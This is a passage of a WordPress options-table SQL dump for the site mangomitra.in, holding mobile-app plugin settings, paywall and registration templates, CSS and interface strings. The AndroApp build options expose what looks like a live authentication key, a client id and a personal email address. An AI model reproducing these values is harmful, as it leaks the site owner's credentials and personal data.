_height\";s:0:\"\";}s:6:\"latest\";a:3:{s:5:\"limit\";s:0:\"\";s:19:\"product_image_width\";s:0:\"\";s:20:\"product_image_height\";s:0:\"\";}}\";','yes'),(23171,'appful_ssl_available','1','yes'),(23172,'appful_last_ssl_check','1644404751','yes'),(23173,'appful_ip','[\"52.29.82.126\",\"3.122.58.92\",\"s2.appful.io\",\"94.130.130.142\",\"2a01:4f8:192:51f5::2\"]','yes'),(23174,'appful_been_installed','1','yes'),(23176,'widget_appful','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(23177,'appful_quickconnect_id','xa48huayMUy7hC5kPT2P','yes'),(23181,'appful_register_last_refresh','1644571934','yes'),(23384,'ml_article_list_include_post_types','post','yes'),(23385,'ml_custom_featured_image','','yes'),(23386,'ml_menu_show_favorites','1','yes'),(23387,'ml_show_android_cat_tabs','1','yes'),(23388,'ml_allow_landscape','1','yes'),(23389,'ml_article_list_enable_dates','1','yes'),(23390,'ml_original_size_featured_image','1','yes'),(23391,'ml_show_article_featuredimage','1','yes'),(23392,'ml_post_author_enabled','1','yes'),(23393,'ml_followimagelinks','0','yes'),(23394,'ml_post_date_enabled','1','yes'),(23395,'ml_post_title_enabled','1','yes'),(23396,'ml_page_title_enabled','1','yes'),(23397,'ml_internal_links','1','yes'),(23398,'ml_article_list_view_type','compact','yes'),(23399,'ml_datetype','prettydate','yes'),(23400,'ml_dateformat','F j, Y','yes'),(23401,'ml_show_email_contact_link','1','yes'),(23402,'ml_contact_link_email','wp@dxpsites.com','yes'),(23403,'ml_copyright_string','&copy; 2022 Mango Mitra','yes'),(23404,'ml_comments_system','wordpress','yes'),(23405,'ml_related_header','Related Posts','yes'),(23406,'ml_related_image','1','yes'),(23407,'ml_tabbed_navigation_enabled','1','yes'),(23408,'ml_tabbed_navigation','a:4:{s:17:\"active_icon_color\";s:7:\"#222222\";s:19:\"inactive_icon_color\";s:7:\"#666666\";s:16:\"background_color\";s:7:\"#FFFFFF\";s:4:\"tabs\";a:5:{i:0;a:9:{s:7:\"enabled\";s:1:\"1\";s:5:\"label\";s:4:\"Home\";s:8:\"icon_url\";s:89:\"https://mangomitra.in/wp-content/plugins/mobiloud-mobile-app-plugin/assets/icons/home.png\";s:4:\"type\";s:10:\"homescreen\";s:3:\"url\";s:0:\"\";s:12:\"endpoint_url\";s:36:\"https://mangomitra.in/ml-api/v2/loop\";s:21:\"horizontal_navigation\";s:3:\"top\";s:16:\"first_item_label\";s:4:\"Home\";s:24:\"webview_background_color\";s:7:\"#FFFFFF\";}i:1;a:9:{s:7:\"enabled\";s:1:\"1\";s:5:\"label\";s:8:\"Sections\";s:8:\"icon_url\";s:105:\"https://mangomitra.in/wp-content/plugins/mobiloud-mobile-app-plugin/assets/icons/format_list_bulleted.png\";s:4:\"type\";s:8:\"sections\";s:3:\"url\";s:0:\"\";s:12:\"endpoint_url\";s:40:\"https://mangomitra.in/ml-api/v2/sections\";s:21:\"horizontal_navigation\";a:0:{}s:16:\"first_item_label\";s:0:\"\";s:24:\"webview_background_color\";s:7:\"#FFFFFF\";}i:2;a:8:{s:7:\"enabled\";s:1:\"1\";s:5:\"label\";s:9:\"Favorites\";s:8:\"icon_url\";s:93:\"https://mangomitra.in/wp-content/plugins/mobiloud-mobile-app-plugin/assets/icons/bookmark.png\";s:4:\"type\";s:9:\"favorites\";s:3:\"url\";s:0:\"\";s:21:\"horizontal_navigation\";a:0:{}s:16:\"first_item_label\";s:0:\"\";s:24:\"webview_background_color\";s:7:\"#FFFFFF\";}i:3;a:8:{s:7:\"enabled\";s:1:\"1\";s:5:\"label\";s:8:\"Settings\";s:8:\"icon_url\";s:93:\"https://mangomitra.in/wp-content/plugins/mobiloud-mobile-app-plugin/assets/icons/settings.png\";s:4:\"type\";s:8:\"settings\";s:3:\"url\";s:0:\"\";s:21:\"horizontal_navigation\";a:0:{}s:16:\"first_item_label\";s:0:\"\";s:24:\"webview_background_color\";s:7:\"#FFFFFF\";}i:4;a:8:{s:7:\"enabled\";s:1:\"0\";s:5:\"label\";s:8:\"Disabled\";s:8:\"icon_url\";s:0:\"\";s:4:\"type\";s:0:\"\";s:3:\"url\";s:0:\"\";s:21:\"horizontal_navigation\";a:0:{}s:16:\"first_item_label\";s:0:\"\";s:24:\"webview_background_color\";s:7:\"#FFFFFF\";}}}','yes'),(23409,'ml_app_subscription_block_content','<img src=\"%LOGOURL%\" width=\"250\" height=\"auto\" />\n\n<p class=\"description\">Subscribe today to gain full access to the content</p>\n<a class=\"ml-paywall__button\" onclick=\"nativeFunctions.handleButton( \'in_app_purchase\', \'in.app.purchase.id\', null )\">\nMonthly\n<span>Free for 1 month, then $10.99 per month</span>\n</a>\n\n<a class=\"ml-paywall__button\" onclick=\"nativeFunctions.handleButton( \'in_app_purchase\', \'in.app.purchase.id\', null )\">\nAnnual\n<span>Free for 1 month, then $99.99 per year</span>\n</a>\n\n<p>\n$10.99 per month or $99.99 per year.<br />You can cancel anytime<br/><br />\nAlready a member? <a onclick=\"nativeFunctions.handleButton(\'login\', null, null)\">Sign-in</a> or <a onclick=\"nativeFunctions.handleButton(\'restore_purchase\', null, null)\">restore purchase</a>\n</p>\n\n<div class=\"separator\"></div>\n\n<div class=\"terms-conditions\">\n<h3>Terms &amp; Conditions</h3>\n<p>Payments will be charged to your Account at confirmation purchase.</p>\n<p>The subscription automatically renews unless auto-renew is turned off at least 24-hours before the end of the current period.</p>\n<p>Your account will be charged for renewal within 24 hours prior to the end of the current period.</p>\n<p>Subscriptions may be managed by the user and auto-renewal may be turned off by going to the user\'s Account Settings after purchase.</p>\n<p>Any unused portion of the free trial period, if offered, will be forfeited when the user purchases a subscription, where applicable.</p>\n<p>Learn more about our <a onclick=\"nativeFunctions.handleLink(\'https://mangomitra.in/terms\', \'Terms of Service\', \'internal\')\">Terms of use</a> and <a onclick=\"nativeFunctions.handleLink(\'https://mangomitra.in/privacy\', \'Privacy Policy\', \'internal\')\">Privacy Policy</a></p>\n</div>','yes'),(23410,'ml_app_subscription_block_css','@import url(\'https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600;700&family=Roboto:wght@100;300;400;500;700&display=swap\');\nbody.ml-subscription {\nbackground:#000;\ncolor: #FFF;\nfont-size: 16px;\nfont-family: \'Roboto\', sans-serif;\n}\n.ml-subscription .wrapper {\nmax-width: 800px;\nmargin: 0 auto;\npadding: 40px 20px 0 20px;\ntext-align: center;\nword-break: break-word;\n}\n.ml-subscription h2 { font-family:\"Open Sans\", serif; color: #FFF; font-size: 28px; font-weight:600; margin-bottom:30px; }\n.ml-subscription h1 { font-family:\"Open Sans\", serif; color: #FFF; font-size: 26px; font-weight:bold; }\n.ml-subscription img {\nmargin: 0 auto 25px auto;\nmax-width:100%;\n}\n.ml-subscription p.description {\nfont-size: 18px;\nline-height: 1.4em;\n}\n.ml-subscription p a {\ncolor: #F6E54B;\nfont-weight: bold;\ntext-decoration: none;\n}\n.ml-paywall__button {\ncolor: #000;\nbackground: #4cba6f;\ndisplay:block;\npadding: 20px 30px;\nmargin: 0 0 20px 0;\ntext-decoration: none;\nfont-size: 18px;\nfont-weight: bold;\nborder-radius: 6px;\n}\n.ml-paywall__button span {\nfont-size:14px;\nfont-weight:normal;\ndisplay:block;\n}\n.terms-conditions {\npadding: 15px 0;\ntext-align: left;\n}\n.terms-conditions h3 {\ncolor: #FFF;\nfont-size: 18px;\n}\n#ml-subscription-close {\nposition: absolute;\ntop: 0;\nleft: 0;\nfont-size: 36px;\npadding: 10px;\ndisplay: block;\nborder-radius: 50%;\ntransform: rotate(45deg);\nfont-weight: 200;\nline-height: 30px;\nwidth: 30px;\n}\n.separator {\ndisplay:block;\nborder-bottom:1px solid #ddd;\npadding-top:20px;\nmargin-bottom:30px;\n}','yes'),(23411,'ml_app_registration_block_content','<img src=\"%LOGOURL%\" width=\"250\" height=\"auto\" />\n<p class=\"description\">\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.\n</p>\n<div class=\"registration-errors\" id=\"reg_errors\"></div>\n<form id=\"reg_form\" action=\"\" method=\"post\">\n<p>\n<label for=\"reg_user\">Email<br>\n<input type=\"text\" id=\"reg_user\" class=\"reg-input border-radius border-gray\" value=\"\" size=\"20\">\n</label>\n</p>\n<p>\n<label for=\"reg_pass\">Password<br>\n<input type=\"password\" id=\"reg_pass\" class=\"reg-input border-radius border-gray\" value=\"\" size=\"20\">\n</label>\n</p>\n<p class=\"terms\"><label for=\"reg_terms\"><input type=\"checkbox\" id=\"reg_terms\" value=\"1\" class=\"border-radius border-gray reg-checkbox\"> Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore</label></p>\n<p class=\"submit\">\n<input type=\"submit\" id=\"wp-submit\" class=\"reg-button border-radius border-gray\" value=\"Register\">\n</p>\n</form>','yes'),(23412,'ml_app_registration_block_css','@import url(\"https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600;700&amp;family=Roboto:wght@100;300;400;500;700&amp;display=swap\");\nbody.ml-registration {\nbackground:#ffffff;\ncolor: #000000;\nfont-size: 16px;\nfont-family: \"Roboto\", sans-serif;\n}\n.ml-registration .wrapper {\nmax-width: 480px;\nmargin: 0 auto;\npadding: 40px 20px 0 20px;\ntext-align: left;\nword-break: break-word;\n}\n.ml-registration img {\nmargin: 0 auto 25px auto;\nmax-width:100%;\ndisplay: block;\n}\n.ml-registration p {\nmargin: 0 0 25px 0;\nfont-size: 18px;\nline-height: 1.4em;\n}\n.ml-registration p a {\ncolor: #0000FF;\nfont-weight: bold;\ntext-decoration: none;\n}\n.registration-errors {\ndisplay: none;\nfont-size: 18px;\nline-height: 1.4em;\nbackground-color: #f9bbbb;\nfont-weight: bold;\ntext-decoration: none;\nborder-radius: 5px;\nborder-color: #f9bbbb;\noverflow: hidden;\nmargin: 0 0 25px 0;\npadding: 20px;\nopacity: 1;\n}\n.registration-errors p {\nmargin-bottom: 10px;\n}\n.registration-errors p:last-child {\nmargin-bottom: 0;\n}\n.ml-registration .reg-input  {\nbox-sizing: border-box;\nmargin: 0;\nfont-size: 18px;\nline-height: 1.4em;\nwidth: 100%;\npadding: 10px;\n}\n.ml-registration .border-radius {\nborder-radius: 5px;\n}\n.ml-registration .border-gray {\nborder-color: #ddd;\nborder-style: solid;\nborder-width: 2px;\n}\n\np.terms {\nposition: relative;\npadding-left: 40px;\n}\n.reg-checkbox {\nposition: absolute;\nleft: 0px;\nwidth: 1.5em;\nheight: 1.5em;\nvertical-align: bottom;\n}\n.reg-button {\nbox-sizing: border-box;\nmargin: 0;\nfont-size: 18px;\nline-height: 1.4em;\nwidth: 100%;\npadding: 10px;\nbackground-color: #aaa;\ncolor: white;\ncursor: pointer;\nborder-bottom-color: #888;\nborder-right-color: #888;\n}\n.reg-button:hover {\nbackground-color: #999;\n}\n\n.ml-loader {\ndisplay: none;\nz-index: 9999;\nposition: fixed;\ntop: 0;\nleft: 0;\nbottom: 0;\nright: 0;\nopacity: 0.7;\nbackground-color: #000;\nbackground-size: 64px 64px;\nbackground-image: url(https://mangomitra.in/wp-content/plugins/mobiloud-mobile-app-plugin/assets/img/android-spinner.svg);\nbackground-repeat: no-repeat;\nbackground-position: center;\n}\n.is-ios .ml-loader {\nbackground-image: url(https://mangomitra.in/wp-content/plugins/mobiloud-mobile-app-plugin/assets/img/ios-spinner.svg);\n}\n.ml-close {\nposition: absolute;\ntop: 0;\nleft: 0;\nfont-size: 36px;\npadding: 10px;\ndisplay: block;\nborder-radius: 50%;\ntransform: rotate(45deg);\nfont-weight: 200;\nline-height: 30px;\nwidth: 30px;\n}\nbody.is-loading .ml-loader {\ndisplay: block;\n}','yes'),(23413,'ml_paywall_pblock_content','<h2>Login to continue reading</h2>\n<p>This content is for premium members only, in order to continue reading you must have a subscription.</p>\n<a class=\"ml-paywall__button\" onclick=\"nativeFunctions.handleButton( \'subscription_screen\', null, \'https://mangomitra.in/ml-api/v2/subscription\' )\">Subscribe now</a>','yes'),(23414,'ml_paywall_pblock_css','html, body {\npointer-events: none;\noverflow: hidden;\nword-break: break-word;\nmargin: 0;\nheight: 100%;\n}\n.ml-paywall {\ndisplay: block;\nposition: fixed;\ntop: 0;\nbottom: 0;\nleft: 0;\nright: 0;\nz-index: 99999;\nbackground: rgba( 255,255,255,0.4 );\npointer-events: all;\n}\n.ml-paywall__wrap {\nposition: absolute;\nleft: 0;\nright: 0;\nbottom: 0;\nbackground-image: linear-gradient( to top, rgba(255,255,255,1) 85%, rgba(255,255,255,0) );\npadding: 50px 20px 20px;\ntext-align: center;\n}\n.ml-paywall__wrap h2 {\nfont-size: 24px;\nfont-weight: bold;\nmargin: 15px 0;\n}\n.ml-paywall__wrap p {\nfont-size: 16px;\nline-height: 1.4;\nmargin-bottom:15px;\n}\n.ml-paywall__button {\ncolor: #000;\nbackground: #4cba6f;\ndisplay: inline-block;\npadding: 20px 30px;\nmargin: 0 0 20px 0;\ntext-decoration: none;\nfont-size: 18px;\nfont-weight: bold;\nborder-radius: 6px;\n}\n.mb_body_single .ml-paywall__wrap {\nposition:absolute !important;\ntop:320px !important;\nbackground-image: linear-gradient( to top, rgba(255,255,255,1) 98%, rgba(255,255,255,0) ) !important;\n}','yes'),(23415,'ml_app_version','2','yes'),(23416,'ml_list_type','web','yes'),(23417,'ml_version','4.4','yes'),(23418,'ml_preview_upload_image','https://mangomitra.in/wp-content/uploads/2022/02/cropped-MITRA-06-192x192.png','yes'),(23419,'ml_preview_theme_color','#f4f7f9','yes'),(23421,'ml_hamburger_nav','mobile-app-hamburger-menu','yes'),(23422,'ml_sections_menu','mobile-app-sections-menu','yes'),(23423,'ml_push_notification_menu','mobile-app-push-notifications-categories','yes'),(23425,'ml_general_settings_menu','mobile-app-settings-menu','yes'),(23426,'ml-templates','default','yes'),(23427,'ml_api_endpoints_version','2','yes'),(23430,'ml_popup_message_on_mobile_active','','yes'),(23431,'ml_automatic_image_resize','','yes'),(23432,'affiliate_link','','yes'),(23434,'ml_schedule_dismiss','1644405856','yes'),(23435,'ml_welcome_screen_not_avalaible','1','yes'),(23438,'ml_welcome_screen_now','1','yes'),(23439,'ml_welcome_step','details','yes'),(23535,'appplog_filename','apppresser-6203a4e655bea.log','yes'),(24180,'superpwa_hide_newsletter','no','yes'),(24273,'WordApp_plugin_version','1.0','yes'),(24274,'widget_wordapp_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(24288,'wordapp_debug_header','yes','yes'),(24289,'wordapp_debug_footer','yes','yes'),(24673,'pw_androapp_version','2100','yes'),(24674,'pwapp_db_version','1.0.4','yes'),(24675,'pw-mobile-app','a:32:{s:8:\"app_menu\";s:2:\"27\";s:11:\"slider_menu\";s:2:\"82\";s:15:\"image_dimension\";s:7:\"preview\";s:18:\"excerpt_preference\";s:7:\"excerpt\";s:12:\"post_content\";s:12:\"preprocessed\";s:25:\"androapp_selected_Scripts\";s:0:\"\";s:26:\"androapp_postprocessed_css\";s:422:\"androapp img{\r\n    max-width: 100%;\r\n    height: auto;\r\n}\r\niframe{\r\n    max-width: 100%;    \r\n}\r\nfigure {\r\n    max-width: 100%;\r\n    height: auto;\r\n}\r\nimg{\r\n    max-width: 100% !important;\r\n    height: auto;\r\n}\r\ndiv {\r\n    max-width: 100% !important;\r\n}\r\nspan {\r\n    max-width:100%;\r\n    overflow: auto;\r\n}\r\naudio {\r\n    display:block;\r\n    visibility:visible !important;\r\n}\r\nvideo{\r\n    width:100%;\r\n    height:auto;\r\n}\r\n\";s:12:\"androapp_css\";s:193:\"#content-sidebar{\r\n	display:none;\r\n}\r\n#secondary {\r\n	display:none !important;\r\n}\r\n.sidebar, .site-header, .footer-widgets {\r\n	display:none;\r\n}\r\n#menu-header-menu{\r\n	display:none;\r\n}												\";s:15:\"loadurl_postids\";s:0:\"\";s:20:\"preprocessed_postids\";s:0:\"\";s:21:\"postprocessed_postids\";s:0:\"\";s:18:\"loadimages_postids\";s:0:\"\";s:23:\"featured_image_showhide\";s:4:\"show\";s:22:\"share_image_preference\";s:5:\"first\";s:16:\"share_preference\";s:7:\"EXCERPT\";s:30:\"share_textwithimage_preference\";s:5:\"TITLE\";s:17:\"share_suffix_test\";s:3:\"via\";s:17:\"share_suffix_link\";s:4:\"POST\";s:19:\"share_function_name\";s:0:\"\";s:32:\"share_image_with_custom_function\";s:1:\"1\";s:17:\"comments_provider\";s:9:\"wordpress\";s:19:\"show_comments_count\";s:1:\"1\";s:15:\"homepage_widget\";s:5:\"pages\";s:18:\"homepage_post_type\";s:4:\"page\";s:16:\"homepage_post_id\";s:4:\"home\";s:19:\"enable_offline_save\";s:1:\"1\";s:18:\"show_settings_menu\";s:1:\"1\";s:12:\"npa_settings\";s:1:\"1\";s:27:\"push_notifications_settings\";s:1:\"1\";s:18:\"font_size_settings\";s:1:\"1\";s:18:\"regex_open_browser\";s:0:\"\";s:18:\"regex_open_webview\";s:0:\"\";}','yes'),(24676,'pw-mobile-build-options','a:35:{s:14:\"androapp_theme\";s:7:\"compact\";s:16:\"statusBarBgColor\";s:7:\"#61a003\";s:16:\"actionBarBgColor\";s:7:\"#f4832c\";s:19:\"actionBarTitleColor\";s:7:\"#ffffff\";s:13:\"screenBgColor\";s:7:\"#e6e6e6\";s:14:\"feedTitleColor\";s:7:\"#424242\";s:20:\"feedContentTextColor\";s:7:\"#616161\";s:11:\"feedBgColor\";s:7:\"#ffffff\";s:12:\"tagTextColor\";s:7:\"#000000\";s:10:\"tagBgColor\";s:7:\"#e6e6e6\";s:15:\"authorTextColor\";s:7:\"#000000\";s:13:\"timeTextColor\";s:7:\"#000000\";s:8:\"app_name\";s:11:\"Mango Mitra\";s:13:\"app_host_name\";s:21:\"https://mangomitra.in\";s:18:\"androapp_font_name\";s:0:\"\";s:16:\"app_deep_linking\";s:0:\"\";s:16:\"google_sender_id\";s:0:\"\";s:21:\"analytics_tracking_id\";s:0:\"\";s:25:\"ios_analytics_tracking_id\";s:0:\"\";s:13:\"google_app_id\";s:0:\"\";s:20:\"google_services_json\";s:0:\"\";s:29:\"androapp_admob_application_id\";s:0:\"\";s:10:\"ios_app_id\";s:0:\"\";s:18:\"authentication_key\";s:64:\"0p9fh2wgim167dq5pb0144hxk527z8xhjqn0kq9za4qrl7rqjv7vb9cg6zahahdy\";s:9:\"client_id\";s:5:\"39279\";s:21:\"androapp_renewal_date\";s:10:\"1647059923\";s:19:\"androapp_plugin_url\";s:40:\"https://mangomitra.in/wp-content/plugins\";s:12:\"package_name\";s:30:\"mobi.androapp.mangomitra.c8641\";s:13:\"launcher_icon\";s:0:\"\";s:17:\"notification_icon\";s:0:\"\";s:11:\"splashImage\";s:0:\"\";s:13:\"category_base\";s:0:\"\";s:8:\"tag_base\";s:0:\"\";s:12:\"build_source\";s:10:\"getyourapp\";s:5:\"email\";s:21:\"nimyajose10@gmail.com\";}','yes'),(24677,'androapp_account_settings','a:34:{s:29:\"androapp_firebase_api_version\";s:2:\"v1\";s:11:\"gcm_api_key\";s:0:\"\";s:43:\"androapp_firebase_service_account_file_path\";s:0:\"\";s:13:\"google_app_id\";s:0:\"\";s:20:\"google_services_json\";s:0:\"\";s:43:\"notification-custom-post-typee-landing-page\";s:1:\"1\";s:46:\"notification-custom-post-typeelementor_library\";s:1:\"1\";s:49:\"notification-custom-post-typewordapp_mobile_pages\";s:1:\"1\";s:38:\"notification-custom-post-typewpfd_file\";s:1:\"1\";s:20:\"push_stack_thershold\";s:1:\"5\";s:21:\"analytics_tracking_id\";s:0:\"\";s:25:\"ios_analytics_tracking_id\";s:0:\"\";s:29:\"androapp_admob_application_id\";s:0:\"\";s:17:\"mopub_top_ad_unit\";s:0:\"\";s:11:\"top_ad_unit\";s:0:\"\";s:10:\"top_ad_ype\";s:6:\"BANNER\";s:19:\"top_appnext_ad_unit\";s:0:\"\";s:19:\"top__appnext_ad_ype\";s:6:\"BANNER\";s:20:\"mopub_middle_ad_unit\";s:0:\"\";s:12:\"list_ad_unit\";s:0:\"\";s:17:\"list_ad_unit_type\";s:6:\"BANNER\";s:20:\"list_appnext_ad_unit\";s:0:\"\";s:25:\"list_appnext_ad_unit_type\";s:6:\"BANNER\";s:17:\"list_ad_unit_freq\";s:1:\"5\";s:20:\"mopub_bottom_ad_unit\";s:0:\"\";s:14:\"bottom_ad_unit\";s:0:\"\";s:13:\"bottom_ad_ype\";s:6:\"BANNER\";s:22:\"bottom_appnext_ad_unit\";s:0:\"\";s:21:\"bottom_appnext_ad_ype\";s:6:\"BANNER\";s:26:\"mopub_interstitial_ad_unit\";s:0:\"\";s:28:\"appnext_interstitial_ad_unit\";s:0:\"\";s:28:\"appnext_interstitial_ad_type\";s:18:\"INTERSTITIAL_VIDEO\";s:20:\"interstitial_ad_unit\";s:0:\"\";s:25:\"interstitial_ad_unit_freq\";s:1:\"3\";}','yes'),(24678,'androapp_post_content_tab','a:3:{s:22:\"androapp_header_script\";s:0:\"\";s:28:\"androapp_before_post_content\";s:0:\"\";s:27:\"androapp_after_post_content\";s:0:\"\";}','yes'),(24679,'pw-mobile-app-language','a:112:{s:4:\"HOME\";s:4:\"Home\";s:6:\"SELECT\";s:9:\"Select...\";s:15:\"SELECT_CATEGORY\";s:15:\"Select Category\";s:12:\"CANT_CONNECT\";s:13:\"Can\'t Connect\";s:5:\"RETRY\";s:12:\"Tap to Retry\";s:18:\"CONNECTION_TIMEOUT\";s:18:\"Connection Timeout\";s:13:\"UNKNOWN_ERROR\";s:13:\"Unknown Error\";s:7:\"LOADING\";s:10:\"Loading...\";s:11:\"SHARE_TITLE\";s:29:\"Hey, I found this interesting\";s:8:\"NEW_POST\";s:8:\"New Post\";s:9:\"NEW_POSTS\";s:9:\"new posts\";s:4:\"YEAR\";s:4:\"year\";s:5:\"MONTH\";s:5:\"month\";s:3:\"DAY\";s:3:\"day\";s:4:\"HOUR\";s:4:\"hour\";s:6:\"MINUTE\";s:6:\"minute\";s:6:\"SECOND\";s:6:\"second\";s:5:\"YEARS\";s:5:\"years\";s:6:\"MONTHS\";s:6:\"months\";s:4:\"DAYS\";s:4:\"days\";s:5:\"HOURS\";s:5:\"hours\";s:7:\"MINUTES\";s:7:\"minutes\";s:7:\"SECONDS\";s:7:\"seconds\";s:3:\"AGO\";s:3:\"ago\";s:2:\"BY\";s:2:\"by\";s:2:\"IN\";s:2:\"in\";s:11:\"NO_COMMENTS\";s:44:\"No comments yet, Be the first one to comment\";s:14:\"COMMENTS_TITLE\";s:8:\"COMMENTS\";s:13:\"COMMENT_EMPTY\";s:22:\"Comment field is Empty\";s:13:\"PROVIDE_EMAIL\";s:42:\"Please provide your name and email address\";s:15:\"SENDING_COMMENT\";s:18:\"Sending Comment...\";s:19:\"AWAITING_MODERATION\";s:19:\"Awaiting Moderation\";s:12:\"TYPE_MESSAGE\";s:12:\"Type Message\";s:18:\"TYPE_REPLY_MESSAGE\";s:18:\"Type Reply Message\";s:16:\"COMMENT_SETTINGS\";s:17:\"Comments Settings\";s:4:\"NAME\";s:4:\"Name\";s:5:\"EMAIL\";s:5:\"Email\";s:11:\"EMAIL_EMPTY\";s:20:\"Email can\'t be Empty\";s:11:\"VALID_EMAIL\";s:34:\"Please enter a valid email address\";s:19:\"ATLEAST_THREE_CHARS\";s:41:\"Please enter atleast 3 characters in name\";s:10:\"VALID_NAME\";s:19:\"Name can\'t be Empty\";s:6:\"SUBMIT\";s:6:\"Submit\";s:11:\"SEARCH_HINT\";s:12:\"Search Posts\";s:19:\"EMPTY_SEARCH_RESULT\";s:39:\"Sorry, no content matched your criteria\";s:13:\"OFFLINE_POSTS\";s:11:\"Saved Posts\";s:16:\"SAVE_FOR_OFFLINE\";s:12:\"Save Offline\";s:19:\"REMOVE_FROM_OFFLINE\";s:24:\"Remove from Offline Save\";s:17:\"PERMISSION_NEEDED\";s:17:\"Permission Needed\";s:8:\"SETTINGS\";s:8:\"Settings\";s:16:\"PERSONALIZED_ADS\";s:16:\"Personalized Ads\";s:9:\"FONT_SIZE\";s:9:\"Font Size\";s:7:\"DEFAULT\";s:7:\"Default\";s:5:\"SMALL\";s:5:\"Small\";s:6:\"MEDIUM\";s:6:\"Medium\";s:5:\"LARGE\";s:5:\"Large\";s:18:\"PUSH_NOTIFICATIONS\";s:18:\"Push Notifications\";s:12:\"wooseparator\";s:12:\"wooseparator\";s:19:\"PRODUCT_DESCRIPTION\";s:11:\"Description\";s:4:\"CART\";s:4:\"Cart\";s:8:\"CHECKOUT\";s:8:\"Checkout\";s:17:\"ADD_TO_CART_ERROR\";s:24:\"Could not update cart !!\";s:5:\"LOGIN\";s:5:\"Login\";s:8:\"USERNAME\";s:8:\"Username\";s:8:\"PASSWORD\";s:8:\"Password\";s:10:\"REPASSWORD\";s:16:\"Re Type Password\";s:13:\"CANT_BE_EMPTY\";s:14:\"Can\'t be EMpty\";s:16:\"SHIPPING_ADDRESS\";s:16:\"Shipping Address\";s:15:\"BILLING_ADDRESS\";s:15:\"Billing Address\";s:10:\"FIRST_NAME\";s:10:\"First Name\";s:9:\"LAST_NAME\";s:9:\"Last Name\";s:4:\"CITY\";s:4:\"City\";s:5:\"STATE\";s:5:\"State\";s:7:\"COUNTRY\";s:7:\"Country\";s:7:\"PINCODE\";s:7:\"Pincode\";s:8:\"ADDRESS1\";s:9:\"Address 1\";s:8:\"ADDRESS2\";s:9:\"Address 2\";s:5:\"PHONE\";s:5:\"Phone\";s:20:\"PASSWORDS_DONT_MATCH\";s:21:\"Password do not match\";s:17:\"ENTER_COUPON_CODE\";s:17:\"Enter Coupon Code\";s:12:\"APPLY_COUPON\";s:12:\"Apply Coupon\";s:8:\"SUBTOTAL\";s:8:\"Subtotal\";s:5:\"TAXES\";s:5:\"Taxes\";s:21:\"SHIPPING_AND_HANDLING\";s:21:\"Shipping And Handling\";s:5:\"TOTAL\";s:5:\"Total\";s:8:\"Discount\";s:8:\"Discount\";s:4:\"NEXT\";s:4:\"Next\";s:4:\"BACK\";s:4:\"Back\";s:10:\"ORDER_NOTE\";s:10:\"Order Note\";s:15:\"SHIPPING_METHOD\";s:15:\"Shipping Method\";s:12:\"ORDER_REVIEW\";s:12:\"Order Review\";s:14:\"ORDER_COMPLETE\";s:12:\"Order Status\";s:14:\"PAYMENT_METHOD\";s:14:\"Payment Method\";s:5:\"ORDER\";s:5:\"Order\";s:12:\"ORDER_STATUS\";s:12:\"Order Status\";s:10:\"LOGGED_OUT\";s:22:\"You are now logged out\";s:10:\"CART_EMPTY\";s:10:\"Cart Empty\";s:15:\"BROWSE_PRODUCTS\";s:15:\"Browse Products\";s:13:\"ADDED_TO_CART\";s:13:\"Added to cart\";s:6:\"COUPON\";s:6:\"Coupon\";s:7:\"APPLIED\";s:7:\"Applied\";s:3:\"MRP\";s:3:\"MRP\";s:7:\"BUY_NOW\";s:7:\"BUY NOW\";s:12:\"OUT_OF_STOCK\";s:12:\"Out Of Stock\";s:8:\"REGISTER\";s:8:\"Register\";s:25:\"PRODUCT_ADD_TO_CART_ERROR\";s:32:\"Product can not be added to cart\";s:18:\"COUPON_APPLY_ERROR\";s:25:\"Coupon can not be applied\";s:6:\"VENDOR\";s:6:\"Vendor\";s:16:\"NOT_ENOUGH_STOCK\";s:23:\"Sorry, Not enough stock\";s:23:\"SAME_AS_BILLING_ADDRESS\";s:23:\"Same as Billing Address\";s:15:\"UPDATE_QUANTITY\";s:15:\"Update Quantity\";s:12:\"CART_UPDATED\";s:12:\"Cart Updated\";s:24:\"QUANTITY_TEXT_VALIDATION\";s:21:\"Please enter a number\";}','yes'),(24680,'androapp_scripts_detected','a:2:{s:5:\"count\";i:3;s:7:\"scripts\";a:70:{s:12:\"media-editor\";s:56:\"https://mangomitra.in/wp-includes/js/media-editor.min.js\";s:16:\"media-audiovideo\";s:60:\"https://mangomitra.in/wp-includes/js/media-audiovideo.min.js\";s:18:\"taiowc-cart-script\";s:88:\"https://mangomitra.in/wp-content/plugins/th-all-in-one-woo-cart/assets/js/taiowc-cart.js\";s:19:\"owl.carousel-script\";s:89:\"https://mangomitra.in/wp-content/plugins/th-all-in-one-woo-cart/assets/js/owl.carousel.js\";s:11:\"jquery-core\";s:57:\"https://mangomitra.in/wp-includes/js/jquery/jquery.min.js\";s:14:\"jquery-migrate\";s:65:\"https://mangomitra.in/wp-includes/js/jquery/jquery-migrate.min.js\";s:5:\"wapns\";s:90:\"https://mangomitra.in/wp-content/plugins/wordapp-mobile-app/js/ajax.js?date=20220210102316\";s:22:\"pwb-functions-frontend\";s:103:\"https://mangomitra.in/wp-content/plugins/perfect-woocommerce-brands/assets/js/functions-frontend.min.js\";s:46:\"product-pre-orders-for-woo-setting-frontend-js\";s:117:\"https://mangomitra.in/wp-content/plugins/product-pre-orders-for-woo/js/product-pre-orders-for-woo-setting-frontend.js\";s:20:\"superpwa-register-sw\";s:92:\"https://mangomitra.in/wp-content/plugins/super-progressive-web-apps/public/js/register-sw.js\";s:11:\"hoverIntent\";s:55:\"https://mangomitra.in/wp-includes/js/hoverIntent.min.js\";s:25:\"themehunk-megamenu-script\";s:87:\"https://mangomitra.in/wp-content/plugins/themehunk-megamenu-plus//assets/js/megamenu.js\";s:21:\"vi-wcaio-sidebar-cart\";s:90:\"https://mangomitra.in/wp-content/plugins/woo-cart-all-in-one/assets/js/sidebar-cart.min.js\";s:19:\"vi-wcaio-flexslider\";s:91:\"https://mangomitra.in/wp-content/plugins/woo-cart-all-in-one/assets/js/vi-flexslider.min.js\";s:4:\"zoom\";s:86:\"https://mangomitra.in/wp-content/plugins/woocommerce/assets/js/zoom/jquery.zoom.min.js\";s:10:\"flexslider\";s:98:\"https://mangomitra.in/wp-content/plugins/woocommerce/